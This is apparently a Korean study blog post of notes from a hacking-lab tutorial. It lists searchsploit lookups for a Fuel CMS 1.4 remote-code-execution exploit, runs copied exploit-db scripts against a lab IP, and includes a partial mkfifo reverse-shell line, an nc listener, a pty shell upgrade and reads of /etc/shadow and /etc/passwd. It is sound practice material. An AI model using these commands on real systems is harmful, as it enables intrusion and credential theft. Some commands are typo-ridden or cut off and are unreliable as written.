노말틱님 유튜브 영상 보며 실습해보았습니다.
#3 ~ #5 편 실습하며 메모. Oracle Virtual Box 세팅이 제대로 안되 실습이 불편함...
https://www.exploit-db.com/
searchsploit
searchsploit Fuel CMS 1.4
Remote Code Execution
ls -l /usr/share/exploitdb/exploits/
ls -l /usr/share/exploitdb/exploits/linux/webapps/47138.py
find / -name 47138.py
find / -name 47138.py 2 > /dev/null
-- 오류 왜?
-- find: paths must precede expression: '2'
find / -name 47138.py 2> /dev/null
python exploit.py
ruby exploit.rb
gcc exploit.c -o exploit
exploit
cp /usr/share/exploitdb/exploits/linux/webapps/47138.py exploit.py
cp /usr/share/exploitdb/exploits/php/webapps/49487.rb exploit2.rb
cp /usr/share/exploitdb/exploits/php/webapps/50477.rb exploit3.rb
python exploit.py
python2 exploit.py
ruby exploit2.rb
gem install docopt
ruby exploit2.r http://10.10.133.148/ id
python2 exploit3.py
-- 오류
python exploit3.py
웹쉘 1회용 쉘
리버스 쉡
바인드 쉘
python -c "import pty;pty.spawn('/bin/bash')"
echo **** root rm /tmp/f;mkfifo /tmp
nc -nlvp 9999
cat /etc/shadow
googling
reverse shell cheat sheet
linux nc mkfifo 선택
권한 상승 / 백도어 설치
cat /etc/passwd | grep sh
일반 계정이 있으면 일반 계정 해킹하고 권한상승하려했는데...
database.php
python -c "import pty;pty.spawn(''bin/bash')"
googling
os version exploit
privilege escalation
'정보보안기사 > linux' 카테고리의 다른 글
| 칼리 리눅스 재구성(2023-07-26) (0) | 2023.07.16 |
|---|---|
| 좀비 프로세스 확인 방법 (0) | 2023.07.13 |
| 손으로 배우는 해킹 study (0) | 2023.06.23 |
| virtual box kali - 공유 [세팅 실패] (0) | 2023.06.23 |
| 칼리리눅스 설치 (0) | 2023.06.19 |